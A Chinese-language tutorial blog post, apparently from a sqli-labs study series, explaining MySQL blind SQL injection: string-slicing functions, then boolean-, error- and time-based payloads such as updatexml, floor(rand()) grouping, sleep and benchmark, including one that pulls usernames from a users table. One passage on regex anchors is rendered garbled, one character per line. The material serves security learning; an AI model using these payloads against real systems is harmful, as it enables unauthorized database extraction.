本文介绍了SQL盲注的基本概念,包括什么是盲注、盲注的分类,以及在不返回数据的情况下如何利用mid()、substr()、left()和ORD()函数获取数据库信息。同时,对基于布尔、时间、报错的三种盲注类型进行了简述,并给出了相应的SQL注入示例。
“工欲善其事,必先利其器”,在学完1-4之后,我们又将学习一种新的注入方法,那就是盲注,Less 5将在下一篇文章中讲解。
盲注
1.概念:什么叫盲注?就是当你执行了sql语句后,它在前端页面不返回任何数据,此时,我们需要用一些其他的方法尝试得到它数据库中的内容,这个过程就叫做盲注。
附图:
2.类型:盲注分为几类呢?结合你做过的Less 1-4,你就能从中发现它有三类,分别为:
①基于布尔的SQL盲注
②基于时间的SQL盲注
③基于报错的SQL盲注
3.在讲解三种类型之前,插入一个知识点
在sql注入中,往往会用到截取字符串的问题,例如不回显的情况下进行的注入,也称为盲注,这种情况下往往需要一个一个字符的去猜解,过程中需要用到截取字符串。本文中主要列举四个函数和该函数注入过程中的一些用例。(MYSQL数据库)
⑴mid()函数
a:语法格式:MID(column_name,start[,length])
①column_name 要提取字符的字段。
②start 规定开始位置(起始值是 1)。
③length (可选)。要返回的字符数。如果省略,则 MID() 函 数返回剩余文本。
eg: str=“123456” mid(str,2,1) 结果为2
b:Sql实例:
①MID(DATABASE(),1,1)>’a’,查看数据库名第一位,
②MID(DATABASE(),2,1)查看数据库名第二位,依次查看各位字符。
③MID((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T table_schema=0xxxxxxx LIMIT 0,1),1,1)>’a’此处column_name参数可以为sql语句,可自行构造sql语句进行注入。
⑵substr()函数
a:Substr()和substring()函数实现的功能是一样的,均为截取字符串。
语法: ①string substring(string, start, length)
②string substr(string, start, length)
参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。
b.Sql用例:
① substr(DATABASE(),1,1)>’a’,查看数据库名第一位,substr(DATABASE(),2,1)查看数据库名第二位,依次查看各位字符。
② substr((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T table_schema=0xxxxxxx LIMIT 0,1),1,1)>’a’此处string参数可以为sql语句,可自行构造sql语句进行注入。
⑶Left()函数
a:Left()得到字符串左部指定个数的字符
语法格式:①Left ( string, n ) string为要截取的字符串,n为长度。
b:Sql用例:
① left(database(),1)>’a’,查看数据库名第一位,left(database(),2)>’ab’,查看数据库名前二位。
② 同样的string可以为自行构造的sql语句。
⑷ORD()函数
a:此函数为返回第一个字符的ASCII码,经常与上面的函数进行组合使用。
b例如ORD(MID(DATABASE(),1,1))>114 意为检测database()的第一位ASCII码是否大于114,也即是‘r’。
4.开始讲解3种盲注类型
⑴基于布尔SQL 盲注----------构造逻辑判断
①left(database(),1)>’s’ //left()函数
分析:database()显示数据库名称,left(a,b)从左侧截取a 的前b 位
②ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+ ==//==substr()函数,ascii()函数
分析:substr(a,b,c)从b 位置开始,截取字符串a 的c 长度。Ascii()将某个字符转换为ascii 值
③ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23 //ORD()函数,MID()函数
分析:mid(a,b,c)从位置b 开始,截取a 字符串的c 位
,Ord()函数同ascii(),将字符转为ascii 值
④regexp 正则注入
正则注入介绍:http://www.cnblogs.com/lcamry/articles/5717442.html
用法介绍:select user() regexp ‘[a-z]’;
Explain:正则表达式的用法,user()结果为root,regexp 为匹配root 的正则表达式。
第二位可以用select user() regexp '^ro’来进行。
当正确的时候显示结果为1,不正确的时候显示结果为0.
示例介绍:
I select * from users where id=1 and 1=(if((user() regexp ‘^r’),1,0));
IIselect * from users where id=1 and 1=(user() regexp’^ri’);
通过if 语句的条件判断,返回一些条件句,比如if 等构造一个判断。根据返回结果是否等于0 或者1 进行判断。
select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema=‘security’ and table_name regexp ‘^us[a-z]’ limit 0,1);
这里利用select 构造了一个判断语句。我们只需要更换regexp 表达式即可
‘^u[a-z]’ -> ‘^us[a-z]’ -> ‘^use[a-z]’ -> ‘^user[a-z]’ -> FALSE
如何知道匹配结束了?这里大部分根据一般的命名方式(经验)就可以判断。但是如何你在
无法判断的情况下,可以用table_name regexp '^username
′
来
进
行
判
断
。
是
从
开
头
进
行
匹
配
,
'来进行判断。^是从开头进行匹配,
′来进行判断。是从开头进行匹配,是从结尾开始判断。更多的语法可以参考mysql 使用手册进行了解。好,这里思考一个问题? table_name 有好几个,我们只得到了一个user,如何知道其他的?这里可能会有人认为用limit 0,1 改为limit 1,1。
但是这种做法是错误的,limit 作用在前面的select 语句中,而不是regexp。那我们该如
何选择。其实在regexp 中我们是取匹配table_name 中的内容,只要table_name 中有的内
容,我们用regexp 都能够匹配到。因此上述语句不仅仅可以选择user,还可以匹配其他项。
⑤like 匹配注入
和上述的正则类似,mysql 在匹配的时候我们可以用ike 进行匹配。
用法:select user() like ‘ro%’
(2)基于报错的SQL 盲注------构造payload 让信息通过错误提示回显出来
①Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;
explain:此处有三个点,一是需要concat 计数,二是floor,取得0 or 1,进行数据的重复,三是group by 进行分组,但具体原理解释不是很通。
大致原理为分组后数据计数时重复造成的错误。也有解释为mysql 的bug 的问题。但是此处需要将rand(0),rand()需要多试几次才行。
以上语句可以简化成如下的形式。
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)2))
如果关键的表被禁用了,可以使用这种形式
select count() from (select 1 union select null union
select !1) group by concat(version(),floor(rand(0)*2))
如果rand 被禁用了可以使用用户变量来报错
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
②select exp(~(select * FROM(SELECT USER())a)) //double 数值类
型超出范围 //Exp()为以e 为底的对数函数;版本在5.5.5 及其以上
可以参考exp 报错文章:http://www.cnblogs.com/lcamry/articles/5509124.html
③select !(select * from (select user())x) -(ps:这是减号) ~0
//bigint 超出范围;~0 是对0 逐位取反,很大的版本在5.5.5 及其以上
可以参考文章bigint 溢出文章http://www.cnblogs.com/lcamry/articles/5509112.html
④extractvalue(1,concat(0x7e,(select @@version),0x7e)) se//mysql 对xml 数据进行查询和修改的xpath 函数,xpath 语法错误
⑤updatexml(1,concat(0x7e,(select @@version),0x7e),1) //mysql 对xml 数据进行查询和修改的xpath 函数,xpath 语法错误
⑥select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
//mysql 重复特性,此处重复了version,所以报错。
3:基于时间的SQL 盲注——延时注入
①If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判断语句,条件为假,执行sleep
Ps:遇到以下这种利用sleep()延时注入语句
select sleep(find_in_set(mid(@@version, 1, 1), ‘0,1,2,3,4,5,6,7,8,
9,.’));
②该语句意思是在0-9 之间找版本号的第一位。但是在我们实际渗透过程中,这种用法是不可取的,因为时间会有网速等其他因素的影响,所以会影响结果的判断。
UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M
SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;
BENCHMARK(count,expr)用于测试函数的性能,参数一为次数,二为要执行的表达式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执行成功。这是一种边信道攻击,在运行过程中占用大量的cpu 资源。推荐使用sleep()函数进行注入。
扫一扫
612
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
